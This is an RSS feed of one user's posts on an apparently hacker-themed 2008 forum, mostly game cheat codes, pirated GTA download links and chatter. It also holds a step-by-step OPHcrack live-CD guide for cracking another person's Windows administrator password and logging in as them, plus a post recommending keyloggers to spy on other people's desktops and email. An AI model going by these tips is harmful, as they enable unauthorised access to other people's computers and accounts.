<br />
ILOOKLIKEHILARY  Play as Hilary King  <br />
<br />
MYSONISALAWYER  Play as Ken Rosenberg  <br />
<br />
LOOKLIKELANCE  Play as Lance Vance  <br />
<br />
CHEATSHAVEBEENCRACKED  Play as Ricardo Diaz  <br />
<br />
STILLLIKEDRESSINGUP  Change Skin/Clothes  <br />
<br />
PROGRAMMER  Gives Tommy girly arms/legs  <br />
<br />
DEEPFRIEDMARSBARS  Makes Tommy fatter  <br />
<br />
CERTAINDEATH  Makes you smoke a cigarette  <br />
<br />
FANNYMAGNET  Ladies Man, Women Follow You  <br />
<br />
LEAVEMEALONE  Decrease Wanted Level  <br />
<br />
YOUWONTTAKEMEALIVE  Raise Wanted Level  <br />
<br />
ICANTTAKEITANYMORE  Commit Suicide  <br />
<br />
PRECIOUSPROTECTION  Full Armor  <br />
<br />
ASPIRINE  Full Health  <br />
<br />
NUTTERTOOLS  All ''heavy'' weapons  <br />
<br />
PROFESSIONALTOOLS  All ''medium'' weapons  <br />
<br />
THUGSTOOLS  All ''light'' weapons  <br />
<br />
FIGHTFIGHTFIGHT  Peds Riot  <br />
<br />
BOOOOOORING  Makes everything slower  <br />
<br />
ONSPEED  Makes everything faster  <br />
<br />
LIFEISPASSINGMEBY  Speed up game clock  <br />
<br />
NOBODYLIKESME  Peds Hate You  <br />
<br />
OURGODGIVENRIGHTTOBEARARMS  Peds Carry Guns  <br />
<br />
CHICKSWITHGUNS  Girls Carry Guns  <br />
<br />
CHASESTAT  Shows Media Level (when 2+ stars)  <br />
<br />
AIRSHIP  Fast boats can fly for short periods of time <br />
</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=19619</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=32">Cheats</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>GTA III PC cheats</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=19618</link>
			<pubDate>Sun, 27 Apr 2008 23:20:25 GMT</pubDate>
			<description><![CDATA[So, I'm looking at other threads in general discussion for Games. (I'll start with some of the full downloads that I put in General Discussion). 
...]]></description>
			<content:encoded><![CDATA[<font color="Red">So, I'm looking at other threads in general discussion for Games. (I'll start with some of the full downloads that I put in General Discussion).<br />
<br />
NOTE: Some Cheats don't work for certain copies of this game. I'm pretty sure that if you're using a trainer (or other mods), it does disable cheats. Also, there are just some certain copies of the game that don't let you do cheats.<br />
have fun...<br />
<br />
GUNSGUNSGUNS = Weapon Cheat <br />
<br />
IFIWEREARICHMAN = Money Cheat <br />
<br />
GESUNDHEIT = Health Cheat <br />
<br />
TURTOISE (or TORTOISE, in 1.1) = Armor Cheat<br />
<br />
SKINCANCERFORME = Nice Weather <br />
<br />
ILiKESCOTLAND = Fog Thickness Level 1 <br />
<br />
ILOVESCOTLAND = Fog Thickness Level 2 <br />
<br />
PEASOUP = Fog Thickness Level 3<br />
<br />
ITSALLGOINGMAAAD = Crazy Peds <br />
<br />
NOBODYLIKESME = Peds Want To Kill You <br />
<br />
WEAPONSFORALL = Peds Pack Heat (Carry Weapons) <br />
<br />
CHITTYCHITTYBB = Flying Cars<br />
<br />
MOREPOLICEPLEASE = Wanted Level Up <br />
<br />
NOPOLICEPLEASE = Wanted Level Down <br />
<br />
GIVEUSATANK = Spawn A Tank <br />
<br />
ANICESETOFWHEELS = See-Thru Cars <br />
<br />
CORNERSLIKEMAD = Better Driving Code <br />
<br />
TIMEFLIESWHENYOU = Fast Gameplay <br />
<br />
ILIKEDRESSINGUP = Change Character <br />
<br />
BANGBANGBANG = Blow Up Cars Around You<br />
<br />
some Unknown Cheats: <br />
<br />
NASTYLIMBCHEAT = Nastier Limb Removal? <br />
<br />
MADWEATHER = Time Speeds Up? <br />
<br />
BOOOOORING = Unknown (Time Slows Down?)</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=19618</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=32">Cheats</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>WPN Fire, flash download</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=19541</link>
			<pubDate>Wed, 23 Apr 2008 01:41:10 GMT</pubDate>
			<description><![CDATA[WPN Fire download - http://www.megaupload.com/?d=W43YOHVP 
 
really fun flash game. 
 
Have fun...]]></description>
			<content:encoded><![CDATA[<font color="Red">WPN Fire download - <a href="http://www.megaupload.com/?d=W43YOHVP" target="_blank">http://www.megaupload.com/?d=W43YOHVP</a><br />
<br />
really fun flash game.<br />
<br />
Have fun...</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=19541</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=31">Games General Discussion</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>Game Dowloadz</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=19530</link>
			<pubDate>Wed, 23 Apr 2008 01:33:11 GMT</pubDate>
			<description><![CDATA[I have the full, free downloads of Grand Theft Auto: III and Grand Theft Auto: Vice City 
 
GTA 3 - http://www.megaupload.com/?d=UFS03VT9 
 
GTA VC -...]]></description>
			<content:encoded><![CDATA[<font color="Red">I have the full, free downloads of Grand Theft Auto: III and Grand Theft Auto: Vice City<br />
<br />
GTA 3 - <a href="http://www.megaupload.com/?d=UFS03VT9" target="_blank">http://www.megaupload.com/?d=UFS03VT9</a><br />
<br />
GTA VC - <a href="http://www.megaupload.com/?d=BI043RMA" target="_blank">http://www.megaupload.com/?d=BI043RMA</a><br />
<br />
Max Payne mod -ONLY FOR GTA 3 - <a href="http://www.megaupload.com/?d=MU5EWGR3" target="_blank">http://www.megaupload.com/?d=MU5EWGR3</a><br />
<br />
Exhaust Flame mod -ONLY FOR GTA 3 - <a href="http://www.megaupload.com/?d=7SEMA8ZN" target="_blank">http://www.megaupload.com/?d=7SEMA8ZN</a><br />
<br />
Have Fun...</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=19530</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=31">Games General Discussion</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>OPHcrack</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=19516</link>
			<pubDate>Tue, 22 Apr 2008 18:34:15 GMT</pubDate>
			<description><![CDATA[OPHcrack LiveCD help. 
So, I hear a lot of people having problems with this. So, after asking how to use it myself, I finally figured it out, all it...]]></description>
			<content:encoded><![CDATA[<font color="Red">OPHcrack LiveCD help.<br />
So, I hear a lot of people having problems with this. So, after asking how to use it myself, I finally figured it out, all it takes is a little poking around...<br />
<br />
Incase you don't know what OPHcrack is, or where to get it... it's a program that you put on a disk to help you crack the administrator (or anyone else's) password on a Windows computer. to get the program, click the following link ---&gt;<br />
<a href="http://ophcrack.sourceforge.net/" target="_blank">http://ophcrack.sourceforge.net/</a><br />
<br />
It's an .ISO file so it will take a while, then use an image mounting program to burn the .ISO to disk (look up: Sonic, Daemon tools, MagicISO, etc...). put the disk in, and reboot the computer, it should run on it's own.<br />
<br />
If it doesn't run on it's own and you still can't figure out how, when your computer is first starting up go to startup menu (usually, you have to press F1 key to go to startup menu) and it should show a bunch of different options and features. Usually it will show other menus (like main, advance, power, etc, etc), but you have to go to &quot;Boot&quot; and then find &quot;Boot Device Priority,&quot; and you have to set [CD ROM] to first boot device. another option that it should show is &quot;boot-time diagnostic screen&quot; enable that too (this option also shows up under &quot;boot menu.&quot;<br />
<br />
EDIT* if you don't understand what I just explained, I found a link for you. ---&gt;<br />
<a href="http://www.hiren.info/pages/bios-boot-cdrom" target="_blank">http://www.hiren.info/pages/bios-boot-cdrom</a><br />
could be helpful if OPH isn't working for you.<br />
<br />
&lt;<u>ANOTHER PROBLEM A LOT OF PEOPLE HAVE WHEN USING THIS PROGRAM</u>&gt;<br />
<br />
Now, if the CD starts running right away, Slax (or SLAX6) should show up on the screen, it will give you a list of options, but you won't need to enter any of them, it will run on it's own. if something pops up on your monitor saying it's out of range, or if the screen goes blank, press &quot;CTRL - ALT - Numpad + (which is the plus sign right next to your numberpad, incase you didn't know). After pressing that a couple times, it should show up and it will show you all the passwords, elapsed time, etc, etc... then, when it's done or if you want it to stop early for some reason, just hit the power button and the disk will pop out, and the computer will shutdown.<br />
<br />
Then, all you need to do, is log on, as if the administrator account is your own.<br />
<br />
If there is another problem with your OPHcrack LiveCD, I probably can't help you because I haven't had any other problems with it, but if you're <i>not sure</i> why you can't get it to work, check all of this, because maybe that's why.<br />
<br />
also, congradulate me, this is my first actual thread made in hacking.<img src="http://i260.photobucket.com/albums/ii21/palmer640/Smileys/1st.gif" border="0" alt="" /><br />
</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=19516</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=27">Common Questions</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>GT5 Prologue</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=19490</link>
			<pubDate>Sun, 20 Apr 2008 21:45:50 GMT</pubDate>
			<description><![CDATA[Grand Turismo 5. 
 
Usually I don't play the GT games. I've played the GT3 a few times, and it's okay, but not really a favorite. 
 
GT 5 Intro....]]></description>
			<content:encoded><![CDATA[<font color="Red">Grand Turismo 5.<br />
<br />
Usually I don't play the GT games. I've played the GT3 a few times, and it's <i>okay</i>, but not really a favorite.<br />
<br />
<a href="http://www.youtube.com/watch?v=upTZnq7oVog" target="_blank">GT 5 Intro.</a><br />
<br />
Full game is expected to come out April 29th (from what I've heard).</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=19490</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=31">Games General Discussion</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>Fexible TV screens!</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=9128</link>
			<pubDate>Wed, 16 Apr 2008 21:27:04 GMT</pubDate>
			<description><![CDATA[something I found on YouTube. 
http://www.youtube.com/watch?v=JFDyWGstZ-g&NR=1 
yay, now people are gonna start loosing their T.V.s too! (kidding)...]]></description>
			<content:encoded><![CDATA[<font color="Red">something I found on YouTube.<br />
<a href="http://www.youtube.com/watch?v=JFDyWGstZ-g&amp;NR=1" target="_blank">http://www.youtube.com/watch?v=JFDyWGstZ-g&amp;NR=1</a><br />
yay, now people are gonna start loosing their T.V.s too! (kidding)<br />
this would actually be really cool to hook up to something, if the screen were bigger. I think it's really cool =)</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=9128</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=19">Bullshit</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>Post free internet (browser based) games</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=9125</link>
			<pubDate>Wed, 16 Apr 2008 20:35:13 GMT</pubDate>
			<description><![CDATA[Post any free games here. 
I start.Image: http://i260.photobucket.com/albums/ii21/palmer640/Smileys/MrGreen.gif  
 
Fun game called "land of the...]]></description>
			<content:encoded><![CDATA[<font color="red">Post any free games here.<br />
I start.<img src="http://i260.photobucket.com/albums/ii21/palmer640/Smileys/MrGreen.gif" border="0" alt="" /><br />
<br />
Fun game called &quot;land of the dead&quot;<br />
it's a short game, but it's still cool.<br />
<a href="http://www.landofthedeadmovie.net/htdocs/loot_game/play.html" target="_blank">http://www.landofthedeadmovie.net/ht...game/play.html</a></font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=9125</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=31">Games General Discussion</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>Age of Empires 2 cheat list</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=9099</link>
			<pubDate>Wed, 16 Apr 2008 01:14:48 GMT</pubDate>
			<description><![CDATA[People were talking about Age of Empires 2 in the "General Games" forum, so here are some cheats if you play it... 
 
Entry Location: 
Bring up the...]]></description>
			<content:encoded><![CDATA[<font color="Red">People were talking about Age of Empires 2 in the &quot;General Games&quot; forum, so here are some cheats if you play it...<br />
<br />
Entry Location:<br />
Bring up the chat box by pressing ENTER then enter these codes<br />
<br />
ROCK ON (Gives 1000 stone)<br />
<br />
LUMBERJACK (Gives 1000 wood)<br />
<br />
ROBIN HOOD (Gives 1000 gold)<br />
<br />
CHEESE STEAK JIMMY'S (Gives 1000 food)<br />
<br />
MARCO (Reveals map)<br />
<br />
POLO (clears fog)<br />
<br />
AEGIS (Fast build)<br />
<br />
NATURAL WONDERS (Controls nature, not people)<br />
<br />
HOW DO YOU TURN THIS ON (Gives Cobera car)<br />
<br />
TO SMITHEREENS (Gives a Saboteur)<br />
<br />
I R WINNER (Makes you win instantly)<br />
<br />
BLACK DEATH (Destroys all enemies)<br />
<br />
RESIGN (Makes you lose instantly)<br />
<br />
WIMPYWIMPYWIMPY (Destroy yourself)<br />
<br />
<br />
TIP: if you want a lot of something (like stone, or food), don't just type it in once, and hit enter and keep re-doing the same cheat over and over. Copy the texy, then you can just paste and enter the cheat. it works a lot faster...</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=9099</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=32">Cheats</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>YT sucks, join LiveVideo</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=8906</link>
			<pubDate>Wed, 02 Apr 2008 03:16:07 GMT</pubDate>
			<description><![CDATA[Join LiveVideo, forget YouTube. 
 
LiveVideo has more features, like better profile graphics/layout (and pretty much the look and color of all the...]]></description>
			<content:encoded><![CDATA[<font color="Red">Join LiveVideo, forget YouTube.<br />
<br />
LiveVideo has more features, like better profile graphics/layout (and pretty much the look and color of all the pages),  it shows video upload progress, and it has a lot faster upload progress, etc, etc... it's new and doesn't have as many videos, but if more people join, it'll be better. <img src="images/smilies/biggrin.gif" border="0" alt="" title="Big Grin" class="inlineimg" /></font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=8906</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=19">Bullshit</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>logo contest thread!!</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=8613</link>
			<pubDate>Fri, 07 Mar 2008 04:08:53 GMT</pubDate>
			<description><![CDATA[Most people already know, The Anarchist has a new 'main logo' for the site. if you want to 'speak your mind' or add thoughts to the logo that is...]]></description>
			<content:encoded><![CDATA[<font color="Red">Most people already know, The Anarchist has a new 'main logo' for the site. if you want to 'speak your mind' or add thoughts to the logo that is <i>currently</i> being used, please <a href="http://www.anarchistcookbook.com/vbulletin/showthread.php?t=8525" target="_blank">CLICK HERE</a><br />
<br />
If people think they can make a new logo, or add to it, etc, etc... This is the thread to post your work in.<br />
It most likely will <i>not</i> be used as the sites main logo, but it will be fun to have a contest and see other peoples ideas.<br />
If you post any of your ideas for a new logo, please explain yourself, or explain what's different, or at least a few details.<br />
<br />
<img src="http://i260.photobucket.com/albums/ii21/palmer640/logoedit.jpg" border="0" alt="" /><br />
<br />
<a href="http://s260.photobucket.com/albums/ii21/palmer640/?action=view&amp;current=logoedit.jpg" target="_blank">THIS</a> is one of my ideas. Personally, I like this site's logo as is, but a few minor changes would be alright.<br />
For example, I changed the &quot;cookbook&quot; text, to make it look a bit darker, and I added part of an anarchy on to the &quot;A&quot; (although I think a <i>real</i>, full anarchy should be used, if it is changed). and I added a slight 'blur effect' to the smileyface, even though I don't think it's needed, I think it's a cool addition.<br />
<br />
The picture I provided is only a rough draft of ideas to show what changes <i>I</i> think should be made to the current logo, so I don't want to here how bad it looks because I didn't takemy time, etc, etc... because I made this in about 2 minutes.<br />
<br />
This 'contest' would be way better and more fun if more people add their ideas to this thread, so please post them.<br />
Have fun.</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=8613</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=19">Bullshit</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>Wallpapers</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=8033</link>
			<pubDate>Wed, 23 Jan 2008 01:52:18 GMT</pubDate>
			<description><![CDATA[post any wallpapers. I'll start out with a few that I have. 
 
Image: http://i260.photobucket.com/albums/ii21/palmer640/water.jpg  
 
Image:...]]></description>
			<content:encoded><![CDATA[<font color="Red">post any wallpapers. I'll start out with a few that I have.</font><br />
<br />
<img src="http://i260.photobucket.com/albums/ii21/palmer640/water.jpg" border="0" alt="" /><br />
<br />
<img src="http://i260.photobucket.com/albums/ii21/palmer640/fire.jpg" border="0" alt="" /><br />
<br />
<img src="http://i260.photobucket.com/albums/ii21/palmer640/killall.jpg" border="0" alt="" /><br />
<br />
<img src="http://i260.photobucket.com/albums/ii21/palmer640/computer.png" border="0" alt="" />]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=8033</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=19">Bullshit</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>funny or die!</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=7800</link>
			<pubDate>Mon, 31 Dec 2007 01:30:23 GMT</pubDate>
			<description><![CDATA[I dunno if any of you have heard of it, but it's a purdy cool site. it's like youtube but a bit different...this video is fuckin' awesome tho>...]]></description>
			<content:encoded><![CDATA[<font color="Red">I dunno if any of you have heard of it, but it's a purdy cool site. it's like youtube but a bit different...this video is fuckin' awesome tho&gt;<br />
<a href="http://www.funnyordie.com/videos/d9684a9228" target="_blank">http://www.funnyordie.com/videos/d9684a9228</a></font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=7800</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=19">Bullshit</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>an allright site...</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=6995</link>
			<pubDate>Tue, 02 Oct 2007 21:06:57 GMT</pubDate>
			<description><![CDATA[...if you like any of Linkin park MCR taking back sunday or HIM... even if you don't like all of the bands, LP made this mashup music contest thing....]]></description>
			<content:encoded><![CDATA[<font color="Red">...if you like any of Linkin park MCR taking back sunday or HIM... even if you don't like all of the bands, LP made this mashup music contest thing. I thought it was pretty cool anyways...<br />
<br />
<a href="http://www.lpconcerts.com/mash" target="_blank">http://www.lpconcerts.com/mash</a><br />
If I could upload my mash-ups, I'd show you... I made some allright sounding ones...</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=6995</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=19">Bullshit</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>Halo 3...</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=5756</link>
			<pubDate>Thu, 10 May 2007 17:19:22 GMT</pubDate>
			<description><![CDATA[Halo 3 is going to be the same as the second one! The only difference is the covenant joins up with Earth to kill the Floods, and you can hold more...]]></description>
			<content:encoded><![CDATA[<font color="Red">Halo 3 is going to be the same as the second one! The only difference is the covenant joins up with Earth to kill the Floods, and you can hold more then 2 weapons at a time, and obviously different levels and weapons. Thats the only difference! I like Halo, but it's just going to be to much like Halo 2. you'd be better off getting a Ps3 then getting an X-box just to wait for Halo 3 to come out.</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=5756</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=31">Games General Discussion</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>M-80s</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=5398</link>
			<pubDate>Fri, 30 Mar 2007 17:49:13 GMT</pubDate>
			<description><![CDATA[were can I get some M-80s. I'v looked loke everywere and asked every1, I just can't seem to get my hands on them. I know other people get them, but I...]]></description>
			<content:encoded><![CDATA[were can I get some M-80s. I'v looked loke everywere and asked every1, I just can't seem to get my hands on them. I know other people get them, but I can't.DAMMIT, I need to blow shit up!!!]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=5398</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=10">Pyro</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>Cell-phone virus</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=4700</link>
			<pubDate>Thu, 08 Feb 2007 19:40:11 GMT</pubDate>
			<description><![CDATA[I'v heard from someone that you can type a certain thing in your cell phone and then call someone it can like lock the call I.D. er sumthin'. I think...]]></description>
			<content:encoded><![CDATA[I'v heard from someone that you can type a certain thing in your cell phone and then call someone it can like lock the call I.D. er sumthin'. I think he was bullshittin', but if there is a way to do it i wanna know.<img src="images/smilies/wink.gif" border="0" alt="" title="Wink" class="inlineimg" />]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=4700</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=11">Hacking</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>If anyone wants to learn how to hack.</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=4699</link>
			<pubDate>Thu, 08 Feb 2007 18:25:52 GMT</pubDate>
			<description><![CDATA[If you ask people how to hack, they don't tell you cuz they think it makes them seem smart. It's not hard. Just go to a search engine (Ask Jeevs,...]]></description>
			<content:encoded><![CDATA[If you ask people how to hack, they don't tell you cuz they think it makes them seem smart. It's not hard. Just go to a search engine (Ask Jeevs, Google...) and ask for a logger, download it, run it. It's that simple. you can get on peoples desktop, see <br />
their E-mails, move/delete their stuff, er whatever.<br />
<br />
<br />
&lt;edited by Cuddles&gt;: please see the below post...or die, and that's not a threat, it's a choice]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=4699</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=11">Hacking</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
	</channel>
</rss>
